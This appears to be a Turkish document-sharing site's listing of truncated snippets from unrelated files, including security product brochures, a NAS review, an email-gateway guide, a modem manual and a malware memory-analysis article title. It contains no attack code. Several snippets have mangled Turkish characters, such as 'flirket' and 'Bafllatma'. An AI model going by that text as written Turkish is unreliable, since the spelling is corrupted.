KASPERSKY ENDPOINT SECURITY FOR BUSINESS

KASPERSKY ENDPOINT SECURITY FOR BUSINESS 1 KASPERSKY ENDPOINT SECURITY FOR BUSINESS Kurumsal unsurlar ve BT üzerindeki etkileri ÇEVİKLİK Hızlı hareket edin, çevik ve esnek olun İşletme sahiplerinin %66'sı kurumsal çevikliğin öncelik olduğunu

Detaylı

Publication : Techno-labs. Title. Date : 03.10.2012. : WD My Book Live. WD My Book Live

Publication : Techno-labs. Title. Date : 03.10.2012. : WD My Book Live. WD My Book Live WD Publication : Techno-labs Title : WD My Book Live Date : 03.10.2012 WD My Book Live Western Digital in ev içi ağ için geliştirdiği My Book Live ı inceledik. Saatlerimizi bundan 10 yıl öncesine geri

Detaylı

EVOK Güvenlik in hedefi daima bu kalite ve standartlarda hizmet sunmakt r. Hasan ERDEM R. Mustafa AL KOÇ. Yönetim Kurulu Baflkan.

EVOK Güvenlik in hedefi daima bu kalite ve standartlarda hizmet sunmakt r. Hasan ERDEM R. Mustafa AL KOÇ. Yönetim Kurulu Baflkan. EVOK Güvenlik, ülkemizde büyük ihtiyaç duyulan güvenlik hizmetlerine kalite getirmek amac yla Mustafa Alikoç yönetiminde profesyonel bir ekip taraf ndan kurulmufltur. Güvenlik sektöründeki 10 y ll k bilgi,

Detaylı

Ortamınızda A.D. veya LDAP sistemi var ise aşağıdaki linkten KoruMail LDAP-AD isimli dokümanı inceleyebilirsiniz.

Ortamınızda A.D. veya LDAP sistemi var ise aşağıdaki linkten KoruMail LDAP-AD isimli dokümanı inceleyebilirsiniz. KoruMail, kullanıcı doğrulama işlemi için herhangi bir dizin sunucu (MS Active Directory, Novell edirectory, Sun Directory Server, OpenLDAP) olmadığı durumlarda kullanıcıları dizin sunucu yerine, MySQL

Detaylı

4.0 Yeni Özellikler. Surgate. L a b s

4.0 Yeni Özellikler. Surgate. L a b s 4.0 Yeni Özellikler Surgate L a b s TM SurGATE Messaging Gateway Genel Bakış : SurGATE, E-mail sunucunuz önünde sisteminize temiz e-posta ulaşması için endüstriyel standart olarak kabul görmüş bütün filtreleme

Detaylı

Kaspersky Open Space Security: Release 2. İşletmeniz için birinci sınıf bir BT güvenliği çözümü

Kaspersky Open Space Security: Release 2. İşletmeniz için birinci sınıf bir BT güvenliği çözümü Kaspersky Open Space Security: Release 2 İşletmeniz için birinci sınıf bir BT güvenliği çözümü Güncellenmiş uygulamalar Updated applications Release 2 uygulamaları: Kaspersky Anti-virus for Windows Workstations

Detaylı

w w w. m i n t o n. c o m. t r K O L A Y K U R U L U M

w w w. m i n t o n. c o m. t r K O L A Y K U R U L U M w w w. m i n t o n. c o m. t r M D S L -2 0 9 A D S L M O D E M K O L A Y K U R U L U M K I L A V U Z U Girifl ADSL Ethernet & USB Router sat n ald n z için teflekkür ederiz! ADSL Router sizin varolan

Detaylı

Bellek Analizi ile Zararlı Yazılım Analizi

Bellek Analizi ile Zararlı Yazılım Analizi Bellek Analizi ile Zararlı Yazılım Analizi Yine bir gün twitter.com/hack4career hesabından duyurulan hack edilmiş ve/veya zararlı yazılım barındıran web sitelerine göz atarken gün aşırı tespit edilen,

Detaylı

T.C. MĠLLÎ EĞĠTĠM BAKANLIĞI AÇIK KAYNAK KODLU HAZIR SĠSTEMLERĠ

T.C. MĠLLÎ EĞĠTĠM BAKANLIĞI AÇIK KAYNAK KODLU HAZIR SĠSTEMLERĠ T.C. MĠLLÎ EĞĠTĠM BAKANLIĞI BĠLĠġĠM TEKNOLOJĠLERĠ AÇIK KAYNAK KODLU HAZIR SĠSTEMLERĠ Ankara, 2013 materyalidir. ĠÇĠNDEKĠLER... iv... 1 1... 3... 3 1.1. Mail ( ) Fo nksiyonuyla E -... 3 1.2. SMTP ile E

Detaylı

Tek bir Satınalma Hesabı ile birden fazla iş ortağı ile çalışabilir miyim?

Tek bir Satınalma Hesabı ile birden fazla iş ortağı ile çalışabilir miyim? Microsoft Ürün ve Hizmet Sözleşmesi nedir? Microsoft Ürün ve Hizmet Sözleşmesi (MPSA), daha fazla esneklik ve kolaylaştırılmış self servis araçlar sağlayan basitleştirilmiş bir sözleşmedir. MPSA, Microsoft

Detaylı

Hüseyin ÇIRAL huseyinciral@gmail.com

Hüseyin ÇIRAL huseyinciral@gmail.com Hüseyin ÇIRAL huseyinciral@gmail.com 1. WAN Optimizasyon Nedir? WAN Optimizasyon ; WAN üzerinden yapılan bağlantılarda (ADSL, G.SHDSL, 3G, MetroEthernet vb), bağlanan lokasyonlar arasındaki veri transferini

Detaylı

Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER

Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER nternet, her fleyi de ifltirdi Hat rlamak ve zihnimizi kullanmak konusunda, geleneksel yöntemlerimizden h zla uzaklafl yoruz. Be endi imiz bir yeme in tarifini,

Detaylı

QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin

QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin Xerox QR Code Uygulaması Hızlı Başlangıç Kılavuzu 702P03999 QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin QR (Quick Response) Code Uygulamasını şu uygulamalarla birlikte kullanınız:

Detaylı

Farkl alanlarda çal flmalar n sürdüren firmam z n bafll ca faaliyet alanlar ;

Farkl alanlarda çal flmalar n sürdüren firmam z n bafll ca faaliyet alanlar ; FARK n zolsun Bir DPAK Prestij Torbalar DPAK File Torbalar DPAK Bantl Torbalar Etiketler Etiketli Çuvallar Rulo Etiketler Üzüm Torbalar Sebze Torbalar Koliler Tüp File ve Extrude File çeflitleri Hakk m

Detaylı

Aile flirketleri, kararlar nda daha subjektif

Aile flirketleri, kararlar nda daha subjektif Dr. Yeflim Toduk Akifl Aile flirketleri, kararlar nda daha subjektif flirket birleflmeleri ve sat nalmalar, türkiye deki küçük iflletmelerden, dev flirketlere kadar her birinin gündeminde olmaya devam

Detaylı

Türkçe PG191. LCD Monitör. H zl Bafllatma K lavuzu

Türkçe PG191. LCD Monitör. H zl Bafllatma K lavuzu PG191 LCD Monitör H zl Bafllatma K lavuzu Güvenlik Bilgisi Monitörü ayarlamadan önce, paket ile birlikte gönderilen tüm belgeleri dikkatlice okuyunuz. Yang n veya elektrik çarpmas riskini önlemek için,

Detaylı

T.C. GAZİ ÜNİVERSİTESİ BİLGİ İŞLEM DAİRESİ BAŞKANLIĞI BİRİMLERİNİN ÇALIŞMA USUL VE ESASLARI HAKKINDAKİ YÖNERGE BİRİNCİ BÖLÜM.

T.C. GAZİ ÜNİVERSİTESİ BİLGİ İŞLEM DAİRESİ BAŞKANLIĞI BİRİMLERİNİN ÇALIŞMA USUL VE ESASLARI HAKKINDAKİ YÖNERGE BİRİNCİ BÖLÜM. T.C. GAZİ ÜNİVERSİTESİ BİLGİ İŞLEM DAİRESİ BAŞKANLIĞI BİRİMLERİNİN ÇALIŞMA USUL VE ESASLARI HAKKINDAKİ YÖNERGE BİRİNCİ BÖLÜM Genel Hükümler Amaç Madde 1- Bu Yönergenin amacı; Gazi Üniversitesi Bilgi İşlem

Detaylı

X. BÖLÜM AYDINLATMA OTOMASYON S STEM

X. BÖLÜM AYDINLATMA OTOMASYON S STEM X. BÖLÜM AYDINLATMA OTOMASYON S STEM 10.1. AYDINLATMA YÖNET M Yap lan araflt rmalar, bir otomasyon sisteminin tam anlam ile uygulanmas ve teknik elemanlar n programl bak mlarda ald önlemler sonucunda y

Detaylı